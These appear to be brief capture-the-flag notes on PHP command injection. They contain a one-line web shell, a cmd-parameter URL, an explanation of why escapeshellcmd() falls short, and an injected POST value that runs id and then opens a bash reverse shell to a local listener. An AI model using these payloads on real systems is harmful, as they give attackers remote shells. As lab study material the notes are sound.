CommandInjection

command-injection-classic

command-injection-escapeshellcmd

<?php
// This looks like a code block but will be preserved in PHP output
system($_GET['cmd']);
?>

alt text

http://vulnerable-server.com/files/converted?cmd=id

command-injection-saint_patrick

The code uses escapeshellcmd() to sanitize the output format parameter, but this is insufficient protection against command injection in this context.

The PHP function escapeshellcmd():

Escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands

Escapes these characters: #&; |*?~<>^()[]{}$, \x0A and \xFF

Does not escape spaces

escapeshellcmd('php;id') → returns 'php\;id'

POST item=beer;id;echo

cd /tmp/uniqid123; tar -cf /tmp/timestamp_beer;id;echo.gz .

curl -X POST http://127.0.0.1:1337/ \
  -d "item=beer;bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1';echo"